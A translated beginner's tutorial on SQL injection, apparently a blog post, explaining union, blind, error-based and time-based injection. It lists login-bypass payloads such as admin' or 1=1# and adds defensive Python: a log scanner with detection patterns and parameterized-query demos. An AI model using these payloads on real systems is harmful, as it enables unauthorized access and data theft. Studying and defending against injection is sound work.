Mainly because, after reading the profound things levixxxx writes and then looking at my own level, I felt low and found it hard to understand, so I decided to . . .
First of all, understand CRUD (create, read, update, delete).
Database and table need no explanation.
1. insert into database.table (column1, column2, ...) values (value1, value2, ...)
insert into 1.news values(3,'test','test','3')
- Remember to put strings in single quotes; numeric values need none.
2. select column1, column2 from database.table ("*" stands for all columns)
- limit: the syntax is limit (start offset, number of rows); it generally goes at the end of the statement
- select * from database.table: query everything
- select id, title from database.table: query the "id" and "title" columns
3. delete from database.table where id = 3: delete the record where id = 3
4. update database.table set column1 = value1, column2 = value2 where condition
update database.table set type = '2' where id = 2: set "type" to 2 for the record where id = 2
The most basic query
select * from 1.news where username='admin' and password='test'
select * from 1.news where username='' or ''='' and password='test'
select * from 1.news where username='' or 1=1#' and password='test'
- "--" and "#" are comment characters; they comment out everything that follows them.
- As long as the logic goes through, it works; pay attention to closing parentheses and single quotes, and note that the source code may already provide the closing characters.
- Universal password: a' or 'a'='a
- Data you would otherwise not get can be appended to the returned data: that is the role of union (mentioned later; its clever use is quite flexible).
- order by (also mentioned later): used to determine the number of columns.
SQL injection basics
What is SQL injection:
Parameters submitted by the user contain characters that become part of the SQL query executed against the database, which changes the semantics of the query so that the attacker obtains the data they want.
- Injection is possible anywhere user input reaches the query, such as the referer, cookie, body, URL, etc.
[Image: Common injection tool .png]
Types of SQL injection (classified by how the data is obtained):
1. Blind injection: determined by true/false logic
- Principle: take characters with the substr function, convert them to ASCII codes, compare the size by binary search, then convert the ASCII codes back into data. ASCII does not support Chinese; for Chinese use the hex function (in MySQL) to convert the Chinese to hexadecimal and then convert it back.
2. Union injection: displays data directly on the page through a union query, for example:
union select username from admin
3. Error-based injection: uses the database's error messages; add a "'" and an error message is displayed, then observe the error messages. (This requires a very high level; anyway, I can't do it...)
4. Time-based injection: determined by the page's response time using the sleep function
What SQL injection can do:
1. Obtain database data (CRUD)
2. Read and write files
3. Execute operating system commands
How to determine whether injection exists:
Numeric, character, and search types
A very important table that you must keep in mind: information_schema.tables
The exists function determines whether a table exists:
exists(select 1 from information_schema.tables)
1. Numeric:
- true and false is false; true or false is true
sql="select * from news where id=1 and 1=1"   sql="select * from news where id=1 order by 1"
- Use order by to judge how many columns there are (order by N tests column N: if the page displays normally the column exists, if not, it does not; the usage above determines the column count), and then use union. Some programmers write an order by themselves, so a "xxxxxx order by ... order by xxxx" situation can occur, which shows a syntax error and so on; everything depends on the actual target.
- Some table queries only show the first row of data, so the first condition should be negated, for example id=1 and 1=2
- Some uses of union are below
2. Character:
sql="select * from news where type='xxx'"
sql="select * from news where type='1' and '1'='1'"
Apart from needing to construct the syntax before and after, everything else is the same as the numeric type. (The excess can be commented out with #.)
Method to determine numeric or character: first construct according to the numeric type.
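As an added defender-side example (not part of the original notes), the following Python script scans constructed web-server log lines for the probe shapes described in the injection-type list and in the numeric/character section above: boolean tests such as and 1=1, order by N, union select, comment markers (including %23, which decodes to #), and the sleep/substr/ascii functions of time-based and blind injection. The log format, the sample entries and the pattern names are assumptions for illustration; the patterns are heuristics, so they are a starting point for alerting rather than a complete filter.

```python
import re
from collections import Counter
from urllib.parse import unquote_plus

# Probe shapes named in the notes above (heuristic, case-insensitive).
PATTERNS = {
    "boolean":  re.compile(r"\b(and|or)\s+\d+\s*=\s*\d+", re.I),         # id=1 and 1=1 / and 1=2
    "order_by": re.compile(r"\border\s+by\s+\d+", re.I),                 # order by N column probing
    "union":    re.compile(r"\bunion\s+(all\s+)?select\b", re.I),        # union select ...
    "comment":  re.compile(r"(--|#|/\*)"),                               # -- and # comment markers
    "time":     re.compile(r"\b(sleep|benchmark)\s*\(", re.I),           # time-based injection
    "blind":    re.compile(r"\b(substr|substring|ascii|mid)\s*\(", re.I), # char-by-char blind probes
}

# Assumed combined-style access log line (constructed format, not from the notes).
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) \S+" (?P<status>\d{3})'
)

# Constructed sample log lines; the requests mirror the probes described in the notes.
SAMPLE_LOG = [
    '10.0.0.5 - - [03/Apr/2020:10:00:01 +0800] "GET /news.php?id=1 HTTP/1.1" 200 512',
    '10.0.0.5 - - [03/Apr/2020:10:00:02 +0800] "GET /news.php?id=1%20and%201=2 HTTP/1.1" 200 88',
    '10.0.0.5 - - [03/Apr/2020:10:00:03 +0800] "GET /news.php?id=1%20order%20by%2010%23 HTTP/1.1" 500 0',
    '10.0.0.7 - - [03/Apr/2020:10:00:04 +0800] "GET /search.php?title=cotton HTTP/1.1" 200 700',
    '10.0.0.5 - - [03/Apr/2020:10:00:05 +0800] "GET /news.php?id=1%20and%20sleep(5)%23 HTTP/1.1" 200 512',
]


def classify(path):
    """Return the sorted pattern names that match the URL-decoded request path.
    Decoding first matters: a GET request carries the comment marker as %23."""
    decoded = unquote_plus(path)
    return sorted(name for name, rx in PATTERNS.items() if rx.search(decoded))


def scan(lines):
    """Parse each log line and keep (ip, path, tags) for requests matching a probe shape."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # skip lines that are not in the assumed format
        tags = classify(m.group("path"))
        if tags:
            findings.append((m.group("ip"), m.group("path"), tags))
    return findings


def per_source(findings):
    """Count flagged requests per client IP; repeated probes from one address stand out."""
    return Counter(ip for ip, _, _ in findings)


if __name__ == "__main__":
    hits = scan(SAMPLE_LOG)
    for ip, path, tags in hits:
        print(ip, path, ",".join(tags))
    print(per_source(hits))
```

Run it against real access logs by replacing SAMPLE_LOG with the file's lines; the per-source count is the signal to alert on, since a single id=1 and 1=2 can be a typo but a sequence of boolean, order by and comment probes from one address is the pattern the notes describe.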
Pseudo-static injection:
Returns 500 or 404 rather than the SQL error message.
1. Inject after the "1" in 1.html; likewise determine numeric or character; the super SQL injection tool can mark the injection position.
2. For example, the page is asd111.html; here you can try constructing asd.php?id=111 or asd.asp?id=111, etc.
3. Remove the .html and see whether the page is still normal.
3. Search type:
- You must choose a keyword that has data; otherwise, no matter how you construct it, no result will appear.
select * from news where title like '%xxxx%'
- the characters appear in the middle of the title: fuzzy query
select * from news where title like 'xxxx%'
- starts with xxxx, ends with any characters
select * from news where title like '%xxxx'
- starts with any characters, ends with xxxx
Close it with the syntax itself: because the middle of %% is empty, everything will be displayed.
Because it is submitted by POST, you can use the # comment directly; if it is GET, it has to be URL-encoded, converting # to %23.
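As an added example (not from the original notes), the following Python script builds a small SQLite table with constructed titles and runs the like '%xxxx%' search in three ways: with the keyword pasted into the query text as the notes show, as a parameterized query, and as a parameterized query whose % and _ are escaped. It reproduces the behaviour described above (an empty keyword matches everything because only %% is left) and adds the caveat a practitioner wants: parameterization alone does not stop a user-supplied % or _ from acting as a wildcard. The table, its rows and the function names are assumptions.

```python
import sqlite3


def make_db():
    """In-memory table with constructed rows; two titles contain LIKE metacharacters."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE news (id INTEGER PRIMARY KEY, title TEXT)")
    conn.executemany("INSERT INTO news VALUES (?, ?)", [
        (1, "100% cotton shirts"),
        (2, "server update"),
        (3, "cotton prices"),
        (4, "under_score test"),
    ])
    conn.commit()
    return conn


def search_concat(conn, keyword):
    """The shape from the notes: where title like '%xxxx%' with the keyword pasted
    into the SQL text. An empty keyword leaves '%%', which matches every row."""
    sql = "SELECT id FROM news WHERE title LIKE '%" + keyword + "%' ORDER BY id"
    return [row[0] for row in conn.execute(sql)]


def search_param(conn, keyword):
    """Parameterized: quotes and comment markers in the keyword stay data, but
    % and _ inside the keyword are still interpreted as LIKE wildcards."""
    pattern = "%" + keyword + "%"
    return [row[0] for row in conn.execute(
        "SELECT id FROM news WHERE title LIKE ? ORDER BY id", (pattern,))]


def like_escape(text, esc="\\"):
    """Escape the LIKE metacharacters so the keyword is matched literally."""
    return (text.replace(esc, esc + esc)
                .replace("%", esc + "%")
                .replace("_", esc + "_"))


def search_param_escaped(conn, keyword):
    """Parameterized and escaped: the ESCAPE clause tells SQLite which character
    neutralises % and _ inside the pattern."""
    pattern = "%" + like_escape(keyword) + "%"
    return [row[0] for row in conn.execute(
        "SELECT id FROM news WHERE title LIKE ? ESCAPE '\\' ORDER BY id", (pattern,))]


if __name__ == "__main__":
    db = make_db()
    for kw in ["", "cotton", "%", "_"]:
        print(repr(kw), search_concat(db, kw), search_param(db, kw), search_param_escaped(db, kw))
```

The escaped variant is the one to ship: it keeps the fuzzy search the notes describe while a keyword of "%" or "_" no longer dumps the whole table.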
Universal password:
select * from 1.news where username='admin' or 1=1# and password=''
Before learning this I thought it looked very simple; just construct it according to the situation; usually you don't know the admin password.
- admin' or 'a'='a
- admin' or 1=1#  (mysql)
- admin' or 1=1--  (sqlserver)
- admin' or 1=1;--  (sqlserver); ";" indicates a multi-statement query
The front is one condition, and "or" is followed by a second condition, so the account password need not be known.
- Usually the super SQL injection tool is used to modify the request packet, together with packet capture.
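The login query from "The most basic query" and the universal password list above, as an added example that is not part of the original notes: a Python/SQLite script with a constructed user table, a login function that concatenates the username and password into the query text exactly as the notes show, and a parameterized version. Running both with the payloads listed above shows why the first one logs in without the password and the second one does not. SQLite understands the -- comment but not MySQL's #, so the -- variant is used; the table, the rows and the function names are assumptions.

```python
import sqlite3


def make_db():
    """Constructed in-memory user table standing in for the notes' 1.news."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?, ?)", [
        (1, "admin", "S3cret!"),
        (2, "guest", "guest"),
    ])
    conn.commit()
    return conn


def build_query(username, password):
    """The vulnerable shape from the notes:
    select * from ... where username='...' and password='...'
    The inputs become part of the SQL text, so a quote in them ends the string early."""
    return ("SELECT id, username FROM users WHERE username='" + username +
            "' AND password='" + password + "'")


def login_concat(conn, username, password):
    """Runs the concatenated query; any returned row counts as 'logged in'."""
    return conn.execute(build_query(username, password)).fetchall()


def login_param(conn, username, password):
    """Parameterized query: the driver sends the values separately from the SQL text,
    so quotes, 'or' and comment markers in the input are compared as plain data."""
    return conn.execute(
        "SELECT id, username FROM users WHERE username=? AND password=?",
        (username, password),
    ).fetchall()


if __name__ == "__main__":
    db = make_db()
    attempts = [("admin", "S3cret!"), ("admin' or 'a'='a", "wrong"), ("admin' or 1=1--", "wrong")]
    for user, pwd in attempts:
        print(build_query(user, pwd))
        print("  concat:", login_concat(db, user, pwd), " param:", login_param(db, user, pwd))
```

With admin' or 'a'='a the concatenated WHERE clause becomes username='admin' or ('a'='a' and password='wrong'), which is true for the admin row; with admin' or 1=1-- the rest of the clause is commented out and every user is returned. The parameterized version returns nothing for both, because the whole string is compared against the username column as data.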